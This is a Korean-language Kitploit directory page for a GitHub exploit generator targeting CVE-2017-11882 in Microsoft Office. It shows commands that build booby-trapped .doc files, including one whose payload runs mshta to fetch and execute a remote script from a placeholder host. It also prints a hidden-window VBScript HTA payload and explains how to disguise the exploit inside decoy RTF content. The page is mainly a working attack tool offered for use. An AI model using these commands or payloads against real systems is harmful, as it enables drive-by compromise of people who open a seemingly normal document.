Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2017-11882 — CVE-2017-11882 (https://github.com/embedi/CVE-2017-11882에서) | Kitploit
도구/GitHubGitHub/ridter/cve-2017-11882
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration Testing
GitHubridter/cve-2017-11882

CVE-2017-11882

CVE-2017-11882 (https://github.com/embedi/CVE-2017-11882에서)

저장소 보기
5352428년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2017-11882

43b 원본 스크립트는 https://github.com/embedi/CVE-2017-11882 에서 가져옴

109b 원본 스크립트는 https://github.com/unamer/CVE-2017-11882/ 에서 가져옴 (감탄하며, 이제 unamer의 코드는 shellcode를 실행할 수 있습니다~)

CVE-2017-11882: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/

MITRE CVE-2017-11882: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11882

Research: https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about

Patch analysis: https://0patch.blogspot.ru/2017/11/did-microsoft-just-manually-patch-their.html

DEMO PoC exploitation: https://www.youtube.com/watch?v=LNFG0lktXQI&lc=z23qixrixtveyb2be04t1aokgz10ymfjvfkfx1coc3qhrk0h00410

사용법

root@kitploit:~
python Command_CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o test.doc

mshta 사용

root@kitploit:~
python Command_CVE-2017-11882.py -c "mshta http://site.com/abc" -o test.doc

abc

root@kitploit:~
<HTML> 
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<HEAD> 
<script language="VBScript">
Window.ReSizeTo 0, 0
Window.moveTo -2000,-2000
Set objShell = CreateObject("Wscript.Shell")
objShell.Run "calc.exe"
self.close
</script>
<body>
demo
</body>
</HEAD> 
</HTML> 

43b 명령 길이는 43 bytes를 초과할 수 없으며, 109b 명령 길이는 109 bytes를 초과할 수 없습니다.

CVE-2017-11882 샘플 익스플로잇 (calc.exe 실행 payload)

example 폴더에는 CVE-2017-11882 취약점을 익스플로잇하여 시스템에서 계산기를 실행하는 .rtf 파일이 들어 있습니다.

사용자 정의 내용에 대하여

사실 사용자 정의 내용은 다른 고수분에게 배운 방법이며, 예전에 이미 스크립트로 작성해 두었습니다. 원래 공개할 생각은 없었지만, 팀 내에서 이미 올린 분이 있어 어쩔 수 없이 공개합니다. 방법은 매우 간단합니다. 일반 문서 rtf를 텍스트 파일로 열고, {\*\datastore 이전의 모든 내용을 복사한 후, {\object\objautlink\objupdate 이전의 내용으로 바꾸면 됩니다. 따라서 스크립트로 작성하는 것은 매우 간단합니다.

사용자 정의 내용을 추가하는 방법은 아무 스크립트나 선택하십시오:

root@kitploit:~
python Command109b_CVE-2017-11882.py -c "mshta http://site.com/abc" -o test.doc -i input.rtf

사용자 정의 내용은 input.rtf에 있습니다.

unamer의 최신 605 바이트 익스플로잇 스크립트는 업데이트하지 않았습니다. 관심 있으면 직접 수정하십시오.

도구 다운로드